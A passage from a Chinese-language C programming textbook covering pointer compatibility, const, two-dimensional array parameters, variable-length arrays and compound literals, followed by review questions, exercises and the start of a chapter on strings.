= %d\n", *pz[0]); printf("  **pz = %d\n", **pz); printf("    pz[2][1] = %d\n", pz[2][1]); printf("*(*(pz+2) + 1) = %d\n", *(*(pz + 2) + 1)); return 0; } 下面是该程序的输出: pz = 0x0064fd38,    pz + 1 = 0x0064fd40 pz[0] = 0x0064fd38,  pz[0] + 1 = 0x0064fd3c *pz = 0x0064fd38,  *pz + 1 = 0x0064fd3c pz[0][0] = 2 *pz[0] = 2 **pz = 2 pz[2][1] = 3 702 *(*(pz+2) + 1) = 3 系统不同,输出的地址可能不同,但是地址之间的关系相同。如前所 述,虽然pz是一个指针,不是数组名,但是也可以使用 pz[2][1]这样的写 法。可以用数组表示法或指针表示法来表示一个数组元素,既可以使用数组 名,也可以使用指针名: zippo[m][n] == *(*(zippo + m) + n) pz[m][n] == *(*(pz + m) + n) 10.7.2 指针的兼容性 指针之间的赋值比数值类型之间的赋值要严格。例如,不用类型转换就 可以把 int 类型的值赋给double类型的变量,但是两个类型的指针不能这样 做。 int n = 5; double x; int * p1 = &n; double * pd = &x; x = n;       // 隐式类型转换 pd = p1;      // 编译时错误 更复杂的类型也是如此。假设有如下声明: int * pt; int (*pa)[3]; int ar1[2][3]; 703 int ar2[3][2]; int **p2; // 一个指向指针的指针 有如下的语句: pt = &ar1[0][0]; // 都是指向int的指针 pt = ar1[0];    // 都是指向int的指针 pt = ar1;      // 无效 pa = ar1;      // 都是指向内含3个int类型元素数组的指针 pa = ar2;      // 无效 p2 = &pt;     // both pointer-to-int * *p2 = ar2[0];   // 都是指向int的指针 p2 = ar2;      // 无效 注意,以上无效的赋值表达式语句中涉及的两个指针都是指向不同的类 型。例如,pt 指向一个 int类型值,而ar1指向一个内含3和int类型元素的数 组。类似地,pa指向一个内含2个int类型元素的数组,所以它与ar1的类型兼 容,但是ar2指向一个内含2个int类型元素的数组,所以pa与ar2不兼容。 上面的最后两个例子有些棘手。变量p2是指向指针的指针,它指向的指 针指向int,而ar2是指向数组的指针,该数组内含2个int类型的元素。所以, p2和ar2的类型不同,不能把ar2赋给p2。但是,*p2是指向int的指针,与 ar2[0]兼容。因为ar2[0]是指向该数组首元素(ar2[0][0])的指针,所以 ar2[0]也是指向int的指针。 一般而言,多重解引用让人费解。例如,考虑下面的代码: int x = 20; 704 const int y = 23; int * p1 = &x; const int * p2 = &y; const int ** pp2; p1 = p2;    // 不安全 -- 把const指针赋给非const指针 p2 = p1;    
// 有效 -- 把非const指针赋给const指针 pp2 = &p1;  // 不安全 –- 嵌套指针类型赋值 前面提到过,把const指针赋给非const指针不安全,因为这样可以使用 新的指针改变const指针指向的数据。编译器在编译代码时,可能会给出警 告,执行这样的代码是未定义的。但是把非const指针赋给const指针没问 题,前提是只进行一级解引用: p2 = p1; // 有效 -- 把非const指针赋给const指针 但是进行两级解引用时,这样的赋值也不安全,例如,考虑下面的代 码: const int **pp2; int *p1; const int n = 13; pp2 = &p1;  // 允许,但是这导致const限定符失效(根据第1行代码, 不能通过*pp2修改它所指向的内容) *pp2 = &n;  // 有效,两者都声明为const,但是这将导致p1指向 n(*pp2已被修改) 705 *p1 = 10;//有效,但是这将改变n的值(但是根据第3行代码,不能修改n 的值) 发生了什么?如前所示,标准规定了通过非const指针更改const数据是 未定义的。例如,在Terminal中(OS X对底层UNIX系统的访问)使用gcc编 译包含以上代码的小程序,导致n最终的值是13,但是在相同系统下使用 clang来编译,n最终的值是10。两个编译器都给出指针类型不兼容的警告。 当然,可以忽略这些警告,但是最好不要相信该程序运行的结果,这些结果 都是未定义的。 C const和C++ const C和C++中const的用法很相似,但是并不完全相同。区别之一是, C++允许在声明数组大小时使用const整数,而C却不允许。区别之二是, C++的指针赋值检查更严格: const int y; const int * p2 = &y; int * p1; p1 = p2; // C++中不允许这样做,但是C可能只给出警告 C++不允许把const指针赋给非const指针。而C则允许这样做,但是如果 通过p1更改y,其行为是未定义的。 10.7.3 函数和多维数组 如果要编写处理二维数组的函数,首先要能正确地理解指针才能写出声 明函数的形参。在函数体中,通常使用数组表示法进行相关操作。 下面,我们编写一个处理二维数组的函数。一种方法是,利用for循环 把处理一维数组的函数应用到二维数组的每一行。如下所示: 706 int junk[3][4] = { {2,4,5,8}, {3,5,6,9}, {12,10,8,6} }; int i, j; int total = 0; for (i = 0; i < 3 ; i++) total += sum(junk[i], 4); // junk[i]是一维数组 记住,如果 junk 是二维数组,junk[i]就是一维数组,可将其视为二维数 组的一行。这里,sum()函数计算二维数组的每行的总和,然后for循环再把 每行的总和加起来。 然而,这种方法无法记录行和列的信息。用这种方法计算总和,行和列 的信息并不重要。但如果每行代表一年,每列代表一个月,就还需要一个函 数计算某列的总和。该函数要知道行和列的信息,可以通过声明正确类型的 形参变量来完成,以便函数能正确地传递数组。在这种情况下,数组 junk 是一个内含 3个数组元素的数组,每个元素是内含4个int类型值的数组(即 junk是一个3行4列的二维数组)。通过前面的讨论可知,这表明junk是一个 指向数组(内含4个int类型值)的指针。可以这样声明函数的形参: void somefunction( int (* pt)[4] ); 另外,如果当且仅当pt是一个函数的形式参数时,可以这样声明: void somefunction( int pt[][4] ); 注意,第1个方括号是空的。空的方括号表明pt是一个指针。这样的变 量稍后可以用作相同方法作为junk。下面的程序示例中就是这样做的,如程 序清单10.17所示。注意该程序清单演示了3种等价的原型语法。 程序清单10.17 array2d.c程序 // array2d.c -- 处理二维数组的函数 707 #include <stdio.h> #define ROWS 3 #define COLS 4 void sum_rows(int ar[][COLS], int rows); void sum_cols(int [][COLS], int);    // 省略形参名,没问题 int sum2d(int(*ar)[COLS], int rows);  // 另一种语法 int main(void) { int junk[ROWS][COLS] = { { 2, 4, 6, 8 }, { 3, 5, 7, 9 }, { 12, 10, 8, 6 } }; sum_rows(junk, ROWS); sum_cols(junk, ROWS); printf("Sum of all elements = %d\n", sum2d(junk, ROWS)); return 0; } void sum_rows(int ar[][COLS], int rows) 708 { int r; int c; int tot; for (r = 0; r < rows; r++) { tot = 0; for (c = 0; c < COLS; c++) tot += ar[r][c]; printf("row %d: sum = %d\n", r, tot); } } void sum_cols(int ar[][COLS], int rows) { int r; int c; int tot; for (c = 0; c < COLS; c++) { 709 tot = 0; for (r = 0; r < rows; r++) tot += ar[r][c]; printf("col %d: sum = %d\n", c, tot); } } int sum2d(int ar[][COLS], int rows) { int r; int c; int tot = 0; for (r = 0; r < rows; r++) for (c = 0; c < COLS; c++) tot += ar[r][c]; return tot; } 该程序的输出如下: row 0: sum = 20 row 1: sum = 24 710 row 2: sum = 36 col 0: sum = 17 col 1: sum = 19 col 2: sum = 21 col 3: sum = 23 Sum of all elements = 80 程序清单10.17中的程序把数组名junk(即,指向数组首元素的指针,首 元素是子数组)和符号常量ROWS(代表行数3)作为参数传递给函数。每 个函数都把ar视为内含数组元素(每个元素是内含4个int类型值的数组)的 数组。列数内置在函数体中,但是行数靠函数传递得到。如果传入函数的行 数是12,那么函数要处理的是12×4的数组。因为rows是元素的个数,然 而,因为每个元素都是数组,或者视为一行,rows也可以看成是行数。 注意,ar和main()中的junk都使用数组表示法。因为ar和junk的类型相 同,它们都是指向内含4个int类型值的数组的指针。 注意,下面的声明不正确: int sum2(int ar[][], int rows); // 错误的声明 前面介绍过,编译器会把数组表示法转换成指针表示法。例如,编译器 会把 ar[1]转换成 ar+1。编译器对ar+1求值,要知道ar所指向的对象大小。下 面的声明: int sum2(int ar[][4], int rows);  // 有效声明 表示ar指向一个内含4个int类型值的数组(在我们的系统中,ar指向的 对象占16字节),所以ar+1的意思是“该地址加上16字节”。如果第2对方括 号是空的,编译器就不知道该怎样处理。 711 也可以在第1对方括号中写上大小,如下所示,但是编译器会忽略该 值: int sum2(int ar[3][4], int rows); // 有效声明,但是3将被忽略 与使用typedef(第5章和第14章中讨论)相比,这种形式方便得多: typedef int arr4[4];    
     // arr4是一个内含 4 个int的数组 typedef arr4 arr3x4[3];        // arr3x4 是一个内含3个 arr4的数 组 int sum2(arr3x4 ar, int rows);   // 与下面的声明相同 int sum2(int ar[3][4], int rows);  // 与下面的声明相同 int sum2(int ar[][4], int rows);  // 标准形式 一般而言,声明一个指向N维数组的指针时,只能省略最左边方括号中 的值: int sum4d(int ar[][12][20][30], int rows); 因为第1对方括号只用于表明这是一个指针,而其他的方括号则用于描 述指针所指向数据对象的类型。下面的声明与该声明等价: int sum4d(int (*ar)[12][20][30], int rows); // ar是一个指针 这里,ar指向一个12×20×30的int数组。 712 10.8 变长数组(VLA) 读者在学习处理二维数组的函数中可能不太理解,为何只把数组的行数 作为函数的形参,而列数却内置在函数体内。例如,函数定义如下: #define COLS 4 int sum2d(int ar[][COLS], int rows) { int r; int c; int tot = 0; for (r = 0; r < rows; r++) for (c = 0; c < COLS; c++) tot += ar[r][c]; return tot; } 假设声明了下列数组: int array1[5][4]; int array2[100][4]; int array3[2][4]; 可以用sum2d()函数分别计算这些数组的元素之和: 713 tot = sum2d(array1, 5);  // 5×4 数组的元素之和 tot = sum2d(array2, 100); // 100×4数组的元素之和 tot = sum2d(array3, 2);  // 2×4数组的元素之和 sum2d()函数之所以能处理这些数组,是因为这些数组的列数固定为4, 而行数被传递给形参rows, rows是一个变量。但是如果要计算6×5的数组 (即6行5列),就不能使用这个函数,必须重新创建一个CLOS为5的函数。 因为C规定,数组的维数必须是常量,不能用变量来代替COLS。 要创建一个能处理任意大小二维数组的函数,比较繁琐(必须把数组作 为一维数组传递,然后让函数计算每行的开始处)。而且,这种方法不好处 理FORTRAN的子例程,这些子例程都允许在函数调用中指定两个维度。虽 然 FORTRAN 是比较老的编程语言,但是在过去的几十年里,数值计算领域 的专家已经用FORTRAN开发出许多有用的计算库。C正逐渐替代 FORTRAN,如果能直接转换现有的FORTRAN库就好了。 鉴于此,C99新增了变长数组(variable-length array,VLA),允许使用 变量表示数组的维度。如下所示: int quarters = 4; int regions = 5; double sales[regions][quarters];  // 一个变长数组(VLA) 前面提到过,变长数组有一些限制。变长数组必须是自动存储类别,这 意味着无论在函数中声明还是作为函数形参声明,都不能使用static或extern 存储类别说明符(第12章介绍)。而且,不能在声明中初始化它们。最终, C11把变长数组作为一个可选特性,而不是必须强制实现的特性。 注意 变长数组不能改变大小 变长数组中的“变”不是指可以修改已创建数组的大小。一旦创建了变长 714 数组,它的大小则保持不变。这里的“变”指的是:在创建数组时,可以使用 变量指定数组的维度。 由于变长数组是C语言的新特性,目前完全支持这一特性的编译器不 多。下面我们来看一个简单的例子:如何编写一个函数,计算int的二维数组 所有元素之和。 首先,要声明一个带二维变长数组参数的函数,如下所示: int sum2d(int rows, int cols, int ar[rows][cols]); // ar是一个变长数组 (VLA) 注意前两个形参(rows和cols)用作第3个形参二维数组ar的两个维度。 因为ar的声明要使用rows和cols,所以在形参列表中必须在声明ar之前先声 明这两个形参。因此,下面的原型是错误的: int sum2d(int ar[rows][cols], int rows, int cols); // 无效的顺序 C99/C11标准规定,可以省略原型中的形参名,但是在这种情况下,必 须用星号来代替省略的维度: int sum2d(int, int, int ar[*][*]); // ar是一个变长数组(VLA),省略了维度 形参名 其次,该函数的定义如下: int sum2d(int rows, int cols, int ar[rows][cols]) { int r; int c; int tot = 0; 715 for (r = 0; r < rows; r++) for (c = 0; c < cols; c++) tot += ar[r][c]; return tot; } 该函数除函数头与传统的C函数(程序清单10.17)不同外,还把符号常 量COLS替换成变量cols。这是因为在函数头中使用了变长数组。由于用变 量代表行数和列数,所以新的sum2d()现在可以处理任意大小的二维int数 组,如程序清单10.18所示。但是,该程序要求编译器支持变长数组特性。 另外,该程序还演示了以变长数组作为形参的函数既可处理传统C数组,也 可处理变长数组。 程序清单10.18 vararr2d.c程序 //vararr2d.c -- 使用变长数组的函数 #include <stdio.h> #define ROWS 3 #define COLS 4 int sum2d(int rows, int cols, int ar[rows][cols]); int main(void) { int i, j; int rs = 3; 716 int cs = 10; int junk[ROWS][COLS] = { { 2, 4, 6, 8 }, { 3, 5, 7, 9 }, { 12, 10, 8, 6 } }; int morejunk[ROWS - 1][COLS + 2] = { { 20, 30, 40, 50, 60, 70 }, { 5, 6, 7, 8, 9, 10 } }; int varr[rs][cs]; // 变长数组(VLA) for (i = 0; i < rs; i++) for (j = 0; j < cs; j++) varr[i][j] = i * j + j; printf("3x5 array\n"); printf("Sum of all elements = %d\n", sum2d(ROWS, COLS,  junk)); printf("2x6 array\n"); printf("Sum of all elements = %d\n", sum2d(ROWS - 1,  COLS + 2, morejunk)); 717 printf("3x10 VLA\n"); printf("Sum of all elements = %d\n", sum2d(rs, cs, varr)); return 0; } // 带变长数组形参的函数 int sum2d(int rows, int cols, int ar[rows][cols]) { int r; int c; int tot = 0; for (r = 0; r < rows; r++) for (c = 0; c < cols; c++) tot += ar[r][c]; return tot; } 下面是该程序的输出: 3x5 array Sum of all elements = 80 2x6 array 718 Sum of all elements = 315 3x10 VLA Sum of all elements = 270 需要注意的是,在函数定义的形参列表中声明的变长数组并未实际创建 
数组。和传统的语法类似,变长数组名实际上是一个指针。这说明带变长数 组形参的函数实际上是在原始数组中处理数组,因此可以修改传入的数组。 下面的代码段指出指针和实际数组是何时声明的: int thing[10][6]; twoset(10,6,thing); ... } void twoset (int n, int m, int ar[n][m]) // ar是一个指向数组(内含m个int类 型的值)的指针 { int temp[n][m];  // temp是一个n×m的int数组 temp[0][0] = 2;  // 设置temp的一个元素为2 ar[0][0] = 2;   // 设置thing[0][0]为2 } 如上代码所示调用twoset()时,ar成为指向thing[0]的指针,temp被创建 为10×6的数组。因为ar和thing都是指向thing[0]的指针,ar[0][0]与thing[0][0] 访问的数据位置相同。 719 const和数组大小 是否可以在声明数组时使用const变量? const int SZ = 80; ... double ar[SZ]; // 是否允许? C90标准不允许(也可能允许)。数组的大小必须是给定的整型常量表 达式,可以是整型常量组合,如20、sizeof表达式或其他不是const的内容。 由于C实现可以扩大整型常量表达式的范围,所以可能会允许使用const,但 是这种代码可能无法移植。 C99/C11 标准允许在声明变长数组时使用 const 变量。所以该数组的定 义必须是声明在块中的自动存储类别数组。 变长数组还允许动态内存分配,这说明可以在程序运行时指定数组的大 小。普通 C数组都是静态内存分配,即在编译时确定数组的大小。由于数组 大小是常量,所以编译器在编译时就知道了。第12章将详细介绍动态内存分 配。 720 10.9 复合字面量 假设给带int类型形参的函数传递一个值,要传递int类型的变量,但是也 可以传递int类型常量,如5。在C99 标准以前,对于带数组形参的函数,情 况不同,可以传递数组,但是没有等价的数组常量。C99新增了复合字面量 (compound literal)。字面量是除符号常量外的常量。例如,5是int类型字 面量, 81.3是double类型的字面量,'Y'是char类型的字面量,"elephant"是字 符串字面量。发布C99标准的委员会认为,如果有代表数组和结构内容的复 合字面量,在编程时会更方便。 对于数组,复合字面量类似数组初始化列表,前面是用括号括起来的类 型名。例如,下面是一个普通的数组声明: int diva[2] = {10, 20}; 下面的复合字面量创建了一个和diva数组相同的匿名数组,也有两个int 类型的值: (int [2]){10, 20}   // 复合字面量 注意,去掉声明中的数组名,留下的int [2]即是复合字面量的类型名。 初始化有数组名的数组时可以省略数组大小,复合字面量也可以省略大 小,编译器会自动计算数组当前的元素个数: (int []){50, 20, 90} // 内含3个元素的复合字面量 因为复合字面量是匿名的,所以不能先创建然后再使用它,必须在创建 的同时使用它。使用指针记录地址就是一种用法。也就是说,可以这样用: int * pt1; pt1 = (int [2]) {10, 20}; 721 注意,该复合字面量的字面常量与上面创建的 diva 数组的字面常量完 全相同。与有数组名的数组类似,复合字面量的类型名也代表首元素的地 址,所以可以把它赋给指向int的指针。然后便可使用这个指针。例如,本例 中*pt1是10,pt1[1]是20。 还可以把复合字面量作为实际参数传递给带有匹配形式参数的函数: int sum(const int ar[], int n); ... int total3; total3 = sum((int []){4,4,4,5,5,5}, 6); 这里,第1个实参是内含6个int类型值的数组,和数组名类似,这同时也 是该数组首元素的地址。这种用法的好处是,把信息传入函数前不必先创建 数组,这是复合字面量的典型用法。 可以把这种用法应用于二维数组或多维数组。例如,下面的代码演示了 如何创建二维int数组并储存其地址: int (*pt2)[4];   // 声明一个指向二维数组的指针,该数组内含2个数组 元素, // 每个元素是内含4个int类型值的数组 pt2 = (int [2][4]) { {1,2,3,-9}, {4,5,6,-8} }; 如上所示,该复合字面量的类型是int [2][4],即一个2×4的int数组。 程序清单10.19把上述例子放进一个完整的程序中。 程序清单10.19 flc.c程序 // flc.c -- 有趣的常量 722 #include <stdio.h> #define COLS 4 int sum2d(const int ar[][COLS], int rows); int sum(const int ar[], int n); int main(void) { int total1, total2, total3; int * pt1; int(*pt2)[COLS]; pt1 = (int[2]) { 10, 20 }; pt2 = (int[2][COLS]) { {1, 2, 3, -9}, { 4, 5,  6, -8 } }; total1 = sum(pt1, 2); total2 = sum2d(pt2, 2); total3 = sum((int []){ 4, 4, 4, 5, 5, 5 }, 6); printf("total1 = %d\n", total1); printf("total2 = %d\n", total2); printf("total3 = %d\n", total3); return 0; 723 } int sum(const int ar [], int n) { int i; int total = 0; for (i = 0; i < n; i++) total += ar[i]; return total; } int sum2d(const int ar [][COLS], int rows) { int r; int c; int tot = 0; for (r = 0; r < rows; r++) for (c = 0; c < COLS; c++) tot += ar[r][c]; return tot; } 724 要支持C99的编译器才能正常运行该程序示例(目前并不是所有的编译 器都支持),其输出如下: total1 = 30 total2 = 4 total3 = 27 记住,复合字面量是提供只临时需要的值的一种手段。复合字面量具有 块作用域(第12章将介绍相关内容),这意味着一旦离开定义复合字面量的 块,程序将无法保证该字面量是否存在。也就是说,复合字面量的定义在最 内层的花括号中。 725 10.10 关键概念 数组用于储存相同类型的数据。C 把数组看作是派生类型,因为数组是 建立在其他类型的基础上。也就是说,无法简单地声明一个数组。在声明数 组时必须说明其元素的类型,如int类型的数组、float类型的数组,或其他类 型的数组。所谓的其他类型也可以是数组类型,这种情况下,创建的是数组 的数组(或称为二维数组)。 通常编写一个函数来处理数组,这样在特定的函数中解决特定的问题, 有助于实现程序的模块化。在把数组名作为实际参数时,传递给函数的不是 整个数组,而是数组的地址(因此,函数对应的形式参数是指针)。为了处 理数组,函数必须知道从何处开始读取数据和要处理多少个数组元素。数组 地址提供了“地址”,“元素个数”可以内置在函数中或作为单独的参数传递。 第 2 种方法更普遍,因为这样做可以让同一个函数处理不同大小的数组。 数组和指针的关系密切,同一个操作可以用数组表示法或指针表示法。 它们之间的关系允许你在处理数组的函数中使用数组表示法,即使函数的形 式参数是一个指针,而不是数组。 对于传统的 C 数组,必须用常量表达式指明数组的大小,所以数组大 小在编译时就已确定。C99/C11新增了变长数组,可以用变量表示数组大 小。这意味着变长数组的大小延迟到程序运行时才确定。 726 10.11 
本章小结 数组是一组数据类型相同的元素。数组元素按顺序储存在内存中,通过 整数下标(或索引)可以访问各元素。在C中,数组首元素的下标是0,所 以对于内含n个元素的数组,其最后一个元素的下标是n-1。作为程序员,要 确保使用有效的数组下标,因为编译器和运行的程序都不会检查下标的有效 性。 声明一个简单的一维数组形式如下: type name [ size ]; 这里,type是数组中每个元素的数据类型,name是数组名,size是数组 元素的个数。对于传统的C数组,要求size是整型常量表达式。但是C99/C11 允许使用整型非常量表达式。这种情况下的数组被称为变长数组。 C把数组名解释为该数组首元素的地址。换言之,数组名与指向该数组 首元素的指针等价。概括地说,数组和指针的关系十分密切。如果ar是一个 数组,那么表达式ar[i]和*(ar+i)等价。 对于 C 语言而言,不能把整个数组作为参数传递给函数,但是可以传 递数组的地址。然后函数可以使用传入的地址操控原始数组。如果函数没有 修改原始数组的意图,应在声明函数的形式参数时使用关键字const。在被 调函数中可以使用数组表示法或指针表示法,无论用哪种表示法,实际上使 用的都是指针变量。 指针加上一个整数或递增指针,指针的值以所指向对象的大小为单位改 变。也就是说,如果pd指向一个数组的8字节double类型值,那么pd加1意味 着其值加8,以便它指向该数组的下一个元素。 二维数组即是数组的数组。例如,下面声明了一个二维数组: double sales[5][12]; 727 该数组名为sales,有5个元素(一维数组),每个元素都是一个内含12 个double类型值的数组。第1个一维数组是sales[0],第2个一维数组是 sales[1],以此类推,每个元素都是内含12个double类型值的数组。使用第2 个下标可以访问这些一维数组中的特定元素。例如,sales[2][5]是slaes[2]的 第6个元素,而sales[2]是sales的第3个元素。 C 语言传递多维数组的传统方法是把数组名(即数组的地址)传递给类 型匹配的指针形参。声明这样的指针形参要指定所有的数组维度,除了第1 个维度。传递的第1个维度通常作为第2个参数。例如,为了处理前面声明的 sales数组,函数原型和函数调用如下: void display(double ar[][12], int rows); ... display(sales, 5); 变长数组提供第2种语法,把数组维度作为参数传递。在这种情况下, 对应函数原型和函数调用如下: void display(int rows, int cols, double ar[rows][cols]); ... display(5, 12, sales); 虽然上述讨论中使用的是int类型的数组和double类型的数组,其他类型 的数组也是如此。然而,字符串有一些特殊的规则,这是由于其末尾的空字 符所致。有了这个空字符,不用传递数组的大小,函数通过检测字符串的末 尾也知道在何处停止。我们将在第11章中详细介绍。 728 10.12 复习题 复习题的参考答案在附录A中。 1.下面的程序将打印什么内容? #include <stdio.h> int main(void) { int ref[] = { 8, 4, 0, 2 }; int *ptr; int index; for (index = 0, ptr = ref; index < 4; index++, ptr++) printf("%d %d\n", ref[index], *ptr); return 0; } 2.在复习题1中,ref有多少个元素? 3.在复习题1中,ref的地址是什么?ref + 1是什么意思?++ref指向什 么? 4.在下面的代码中,*ptr和*(ptr + 2)的值分别是什么? a. int *ptr; 729 int torf[2][2] = {12, 14, 16}; ptr = torf[0]; b. int * ptr; int fort[2][2] = { {12}, {14,16} }; ptr = fort[0]; 5.在下面的代码中,**ptr和**(ptr + 1)的值分别是什么? a. int (*ptr)[2]; int torf[2][2] = {12, 14, 16}; ptr = torf; b. int (*ptr)[2]; int fort[2][2] = { {12}, {14,16} }; ptr = fort; 6.假设有下面的声明: int grid[30][100]; a.用1种写法表示grid[22][56] b.用2种写法表示grid[22][0] 730 c.用3种写法表示grid[0][0] 7.正确声明以下各变量: a.digits是一个内含10个int类型值的数组 b.rates是一个内含6个float类型值的数组 c.mat是一个内含3个元素的数组,每个元素都是内含5个整数的数组 d.psa是一个内含20个元素的数组,每个元素都是指向int的指针 e.pstr是一个指向数组的指针,该数组内含20个char类型的值 8. a.声明一个内含6个int类型值的数组,并初始化各元素为1、2、4、8、 16、32 b.用数组表示法表示a声明的数组的第3个元素(其值为4) c.假设编译器支持C99/C11标准,声明一个内含100个int类型值的数组, 并初始化最后一个元素为-1,其他元素不考虑 d.假设编译器支持C99/C11标准,声明一个内含100个int类型值的数组, 并初始化下标为5、10、11、12、3的元素为101,其他元素不考虑 9.内含10个元素的数组下标范围是什么? 
10.假设有下面的声明: float rootbeer[10], things[10][5], *pf, value = 2.2; int i = 3; 判断以下各项是否有效: 731 a.rootbeer[2] = value; b.scanf("%f", &rootbeer ); c.rootbeer = value; d.printf("%f", rootbeer); e.things[4][4] = rootbeer[3]; f.things[5] = rootbeer; g.pf = value; h.pf = rootbeer; 11.声明一个800×600的int类型数组。 12.下面声明了3个数组: double trots[20]; short clops[10][30]; long shots[5][10][15]; a.分别以传统方式和以变长数组为参数的方式编写处理trots数组的void 函数原型和函数调用 b.分别以传统方式和以变长数组为参数的方式编写处理clops数组的void 函数原型和函数调用 c.分别以传统方式和以变长数组为参数的方式编写处理shots数组的void 函数原型和函数调用 13.下面有两个函数原型: 732 void show(const double ar[], int n);     // n是数组元素的个数 void show2(const double ar2[][3], int n);  // n是二维数组的行数 a.编写一个函数调用,把一个内含8、3、9和2的复合字面量传递给 show()函数。 b.编写一个函数调用,把一个2行3列的复合字面量(8、3、9作为第1 行,5、4、1作为第2行)传递给show2()函数。 733 10.13 编程练习 1.修改程序清单10.7的rain.c程序,用指针进行计算(仍然要声明并初始 化数组)。 2.编写一个程序,初始化一个double类型的数组,然后把该数组的内容 拷贝至3个其他数组中(在main()中声明这4个数组)。使用带数组表示法的 函数进行第1份拷贝。使用带指针表示法和指针递增的函数进行第2份拷贝。 把目标数组名、源数组名和待拷贝的元素个数作为前两个函数的参数。第3 个函数以目标数组名、源数组名和指向源数组最后一个元素后面的元素的指 针。也就是说,给定以下声明,则函数调用如下所示: double source[5] = {1.1, 2.2, 3.3, 4.4, 5.5}; double target1[5]; double target2[5]; double target3[5]; copy_arr(target1, source, 5); copy_ptr(target2, source, 5); copy_ptrs(target3, source, source + 5); 3.编写一个函数,返回储存在int类型数组中的最大值,并在一个简单的 程序中测试该函数。 4.编写一个函数,返回储存在double类型数组中最大值的下标,并在一 个简单的程序中测试该函数。 5.编写一个函数,返回储存在double类型数组中最大值和最小值的差 值,并在一个简单的程序中测试该函数。 734 6.编写一个函数,把double类型数组中的数据倒序排列,并在一个简单 的程序中测试该函数。 7.编写一个程序,初始化一个double类型的二维数组,使用编程练习2中 的一个拷贝函数把该数组中的数据拷贝至另一个二维数组中(因为二维数组 是数组的数组,所以可以使用处理一维数组的拷贝函数来处理数组中的每个 子数组)。 8.使用编程练习2中的拷贝函数,把一个内含7个元素的数组中第3~第5 个元素拷贝至内含3个元素的数组中。该函数本身不需要修改,只需要选择 合适的实际参数(实际参数不需要是数组名和数组大小,只需要是数组元素 的地址和待处理元素的个数)。 9.编写一个程序,初始化一个double类型的3×5二维数组,使用一个处理 变长数组的函数将其拷贝至另一个二维数组中。还要编写一个以变长数组为 形参的函数以显示两个数组的内容。这两个函数应该能处理任意N×M数组 (如果编译器不支持变长数组,就使用传统C函数处理N×5的数组)。 10.编写一个函数,把两个数组中相对应的元素相加,然后把结果储存 到第 3 个数组中。也就是说,如果数组1中包含的值是2、4、5、8,数组2中 包含的值是1、0、4、6,那么该函数把3、4、9、14赋给第3个数组。函数接 受3个数组名和一个数组大小。在一个简单的程序中测试该函数。 11.编写一个程序,声明一个int类型的3×5二维数组,并用合适的值初始 化它。该程序打印数组中的值,然后各值翻倍(即是原值的2倍),并显示 出各元素的新值。编写一个函数显示数组的内容,再编写一个函数把各元素 的值翻倍。这两个函数都以函数名和行数作为参数。 12.重写程序清单10.7的rain.c程序,把main()中的主要任务都改成用函数 来完成。 13.编写一个程序,提示用户输入3组数,每组数包含5个double类型的数 (假设用户都正确地响应,不会输入非数值数据)。该程序应完成下列任 735 务。 a.把用户输入的数据储存在3×5的数组中 b.计算每组(5个)数据的平均值 c.计算所有数据的平均值 d.找出这15个数据中的最大值 e.打印结果 每个任务都要用单独的函数来完成(使用传统C处理数组的方式)。完 成任务b,要编写一个计算并返回一维数组平均值的函数,利用循环调用该 函数3次。对于处理其他任务的函数,应该把整个数组作为参数,完成任务c 和d的函数应把结果返回主调函数。 14.以变长数组作为函数形参,完成编程练习13。 [1].在最后一次while循环中执行完start++;后,start的值就是end的值。——译 者注 736 第11章 字符串和字符串函数 本章介绍以下内容: 函数:gets()、gets_s()、fgets()、puts()、fputs()、strcat()、strncat()、 strcmp()、strncmp()、strcpy()、strncpy()、sprintf()、strchr() 创建并使用字符串 使用C库中的字符和字符串函数,并创建自定义的字符串函数 使用命令行参数 字符串是C语言中最有用、最重要的数据类型之一。虽然我们一直在使 用字符串,但是要学的东西还很多。C 库提供大量的函数用于读写字符串、 拷贝字符串、比较字符串、合并字符串、查找字符串等。通过本章的学习, 读者将进一步提高自己的编程水平。 737 11.1 表示字符串和字符串I/O 第4章介绍过,字符串是以空字符(\0)结尾的char类型数组。因此,可 以把上一章学到的数组和指针的知识应用于字符串。不过,由于字符串十分 常用,所以 C提供了许多专门用于处理字符串的函数。本章将讨论字符串的 性质、如何声明并初始化字符串、如何在程序中输入和输出字符串,以及如 何操控字符串。 程序清单11.1演示了在程序中表示字符串的几种方式。 程序清单11.1 strings1.c程序 //  strings1.c #include <stdio.h> #define MSG "I am a symbolic string constant." #define MAXLENGTH 81 int main(void) { char words[MAXLENGTH] = "I am a string in an array."; const char * pt1 = "Something is pointing at me."; puts("Here are some strings:"); puts(MSG); puts(words); puts(pt1); 738 words[8] = 'p'; puts(words); return 0; } 和printf()函数一样,puts()函数也属于stdio.h系列的输入/输出函数。但 是,与printf()不同的是,puts()函数只显示字符串,而且自动在显示的字符 串末尾加上换行符。下面是该程序的输出: Here are some strings: I am an old-fashioned symbolic string constant. I am a string in an array. Something is pointing at me. 
I am a spring in an array. 我们先分析一下该程序中定义字符串的几种方法,然后再讲解把字符串 读入程序涉及的一些操作,最后学习如何输出字符串。 11.1.1 在程序中定义字符串 程序清单11.1中使用了多种方法(即字符串常量、char类型数组、指向 char的指针)定义字符串。程序应该确保有足够的空间储存字符串,这一点 我们稍后讨论。 1.字符串字面量(字符串常量) 用双引号括起来的内容称为字符串字面量(string literal),也叫作字符 串常量(string constant)。双引号中的字符和编译器自动加入末尾的\0字 符,都作为字符串储存在内存中,所以"I am a symbolic stringconstant."、"I 739 am a string in an array."、"Something is pointed at me."、"Here are some strings:"都是字符串字面量。 从ANSI C标准起,如果字符串字面量之间没有间隔,或者用空白字符 分隔,C会将其视为串联起来的字符串字面量。例如: char greeting[50] = "Hello, and"" how are" " you" " today!"; 与下面的代码等价: char greeting[50] = "Hello, and how are you today!"; 如果要在字符串内部使用双引号,必须在双引号前面加上一个反斜杠 (\): printf("\"Run, Spot, run!\" exclaimed Dick.\n"); 输出如下: "Run, Spot, run!" exclaimed Dick. 字符串常量属于静态存储类别(static storage class),这说明如果在函 数中使用字符串常量,该字符串只会被储存一次,在整个程序的生命期内存 在,即使函数被调用多次。用双引号括起来的内容被视为指向该字符串储存 位置的指针。这类似于把数组名作为指向该数组位置的指针。如果确实如 此,程序清单11.2中的程序会输出什么? 程序清单11.2 strptr.c程序 /* strptr.c -- 把字符串看作指针 */ #include <stdio.h> int main(void) 740 { printf("%s, %p, %c\n", "We", "are", *"space farers"); return 0; } printf()根据%s 转换说明打印 We,根据%p 转换说明打印一个地址。因 此,如果"are"代表一个地址,printf()将打印该字符串首字符的地址(如果使 用ANSI之前的实现,可能要用%u或%lu代替%p)。最后,*"space farers"表 